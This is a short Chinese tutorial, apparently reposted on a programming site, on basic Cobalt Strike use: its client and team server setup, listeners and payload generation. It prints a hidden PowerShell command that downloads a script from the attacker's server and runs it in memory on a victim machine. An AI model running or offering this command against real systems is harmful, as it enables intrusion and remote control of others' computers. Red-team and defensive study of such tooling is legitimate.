本文主要是介绍Cobalt Strike(一)基本使用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一.简介
主页 Cobalt Strike | Adversary Simulation and Red Team Operations
Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。
Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。
Cobalt Strike整体功能了解参考
客户端(clinet gui)
团队成员使用的图形化界面
服务器(Team Server)
生成攻击载荷(payload)
下载攻击代码(会在服务器设置的端口上提供攻击代码下载)
监听器(端口监听)
Team Server 日志记录 保存在logs文件夹
支持团队协同操作
运行坏境
服务器(Team Server) kali linux
客户端 (clinet) java开发跨平台(安装jre即可使用 )
创建服务器(Team Server)
─# ./teamserver
[*] Will use existing X509 certificate and keystore (for SSL)
[*] ./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD]
<host> is the (default) IP address of this Cobalt Strike team server
<password> is the shared password to connect to this server
[/path/to/c2.profile] is your Malleable C2 profile
[YYYY-MM-DD] is a kill date for Beacon payloads run from this server
./teamserver <host> <password>
./teamserver 192.168.1.53 password1
客户端连接(clinet)
linux kali
./cobaltstrike
连接上客户端
如何让目标连接上teamserver?
1.设置监听器(linster)
2.生成攻击载荷
url它是个文件路径
就是让目标 (受害者)通过这个地址和端口下载 恶意脚本
选择好监听器
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.53:80/a'))"
这份代码就是powershell 运行 加载到内存执行。
3.目标机子运行(victim)
——————————————————她拨弄琴弦,扬起潮汐。
这篇关于Cobalt Strike(一)基本使用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!